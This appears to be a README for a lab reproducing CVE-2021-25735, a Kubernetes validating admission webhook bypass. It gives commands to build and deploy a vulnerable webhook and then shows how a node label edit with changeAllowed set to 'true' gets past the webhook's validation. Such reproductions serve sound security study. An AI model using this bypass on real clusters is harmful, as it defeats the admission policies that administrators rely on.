# CVE-2021-25735
## Exploit CVE-2021-25735: Kubernetes Validating Admission Webhook Bypass

### Set the Vulnerable Environment

Let's start with running the script gencerts.sh to generate TLS certificates and keys. \
` bash gencerts.sh`

To deploy the admission controller you need to build the Docker container image locally, tag, and push the image to your Dockerhub using the below commands.\
`docker login` \
`docker build -t validationwebhook:1.0 .` \
`docker tag validationwebhook:1.0 darryk/dev:1.0` \
`docker push darryk/dev:1.0`

Now you can deploy the created image with the Node.js application into your K8s cluster. The webhook-deploy.yaml will deploy all the needed components in your cluster. \
`kubectl apply -f webhook-deploy.yaml`

Let's now register our webhook with Kubernetes API Server. To do that, we create a Base64 of the ca.crt file created before and replace the CA_BUNDLE inside webhook-registration.yaml. \
`cat ca.crt | base64`

Finally, we will register the webhook with the Kubernetes API Server. \
`kubectl apply -f webhook-registration.yaml`


### Exploit CVE-2021-25735

We do a change in the node label using edit nodes and we add a new label.\
`kubectl edit nodes ip-172-20-61-82.ec2.internal`

```
  labels:  
    test: test  
    changeAllowed: "false"
```

Since the ChangeAllowed is set to "false" we get the following error:
> error: nodes "ip-172-20-46-130.ec2.internal" could not be patched: admission webhook "validationwebhook.validationwebhook.svc" denied the request: Validation failed
> You can run `kubectl replace -f /tmp/kubectl-edit-irc64.yaml` to try this update again.

If we retry to modify the node performing the following change:\
```
  labels:  
    test: test  
    changeAllowed: "true"
```

In this case the edit action has been accepted bypassing the admission controller.